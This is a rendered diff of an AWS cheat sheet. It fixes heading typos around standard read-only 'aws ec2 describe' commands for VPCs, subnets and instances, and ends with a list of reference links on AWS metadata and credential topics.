* VPC Endpoint -> Used to access aws services without internet connection (Internet Gateway)
|
* VPC Endpoint -> Used to access aws services without internet connection (Internet Gateway)
|
||||||
* VPN Gateway -> Used to expand the cloud to on premises and vice-versa
|
* VPN Gateway -> Used to expand the cloud to on premises and vice-versa
|
||||||
|
@ -2306,7 +2306,7 @@ IP eni -> Network Interface
|
||||||
aws ec2 describe-vpcs
|
aws ec2 describe-vpcs
|
||||||
```
|
```
|
||||||
|
|
||||||
### Listing VPC's specifing the region
|
### Listing VPC's specifying the region
|
||||||
|
|
||||||
```
|
```
|
||||||
aws ec2 describe-vpcs --region us-west-1
|
aws ec2 describe-vpcs --region us-west-1
|
||||||
|
@ -2318,13 +2318,13 @@ aws ec2 describe-vpcs --region us-west-1
|
||||||
aws ec2 describe-vpcs --filters "Name=vpc-id,Values=ID"
|
aws ec2 describe-vpcs --filters "Name=vpc-id,Values=ID"
|
||||||
```
|
```
|
||||||
|
|
||||||
### Listing subnet's
|
### Listing subnets
|
||||||
|
|
||||||
```
|
```
|
||||||
aws ec2 describe-subnets
|
aws ec2 describe-subnets
|
||||||
```
|
```
|
||||||
|
|
||||||
### Listing subnet's by VPC-id
|
### Listing subnets by VPC-id
|
||||||
|
|
||||||
```
|
```
|
||||||
aws ec2 describe-subnets --filters "Name=vpc-id,Values=ID"
|
aws ec2 describe-subnets --filters "Name=vpc-id,Values=ID"
|
||||||
|
@ -2407,4 +2407,4 @@ aws ec2 describe-instances --filters "Name=subnet-id,Values=ID"
|
||||||
* [Getting started with Version 2 of AWS EC2 Instance Metadata service (IMDSv2) - Sunesh Govindaraj - Nov 25, 2019](https://blog.appsecco.com/getting-started-with-version-2-of-aws-ec2-instance-metadata-service-imdsv2-2ad03a1f3650)
|
* [Getting started with Version 2 of AWS EC2 Instance Metadata service (IMDSv2) - Sunesh Govindaraj - Nov 25, 2019](https://blog.appsecco.com/getting-started-with-version-2-of-aws-ec2-instance-metadata-service-imdsv2-2ad03a1f3650)
|
||||||
* [Gaining AWS Console Access via API Keys - Ian Williams - March 18th, 2020](https://blog.netspi.com/gaining-aws-console-access-via-api-keys/)
|
* [Gaining AWS Console Access via API Keys - Ian Williams - March 18th, 2020](https://blog.netspi.com/gaining-aws-console-access-via-api-keys/)
|
||||||
* [AWS API calls that return credentials - kmcquade](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a)
|
* [AWS API calls that return credentials - kmcquade](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a)
|
||||||
* [A short note on AWS KEY ID - Tal Be'ery - Oct 27, 2023](https://medium.com/@TalBeerySec/a-short-note-on-aws-key-id-f88cc4317489)
|
* [A short note on AWS KEY ID - Tal Be'ery - Oct 27, 2023](https://medium.com/@TalBeerySec/a-short-note-on-aws-key-id-f88cc4317489)
|
||||||
|
|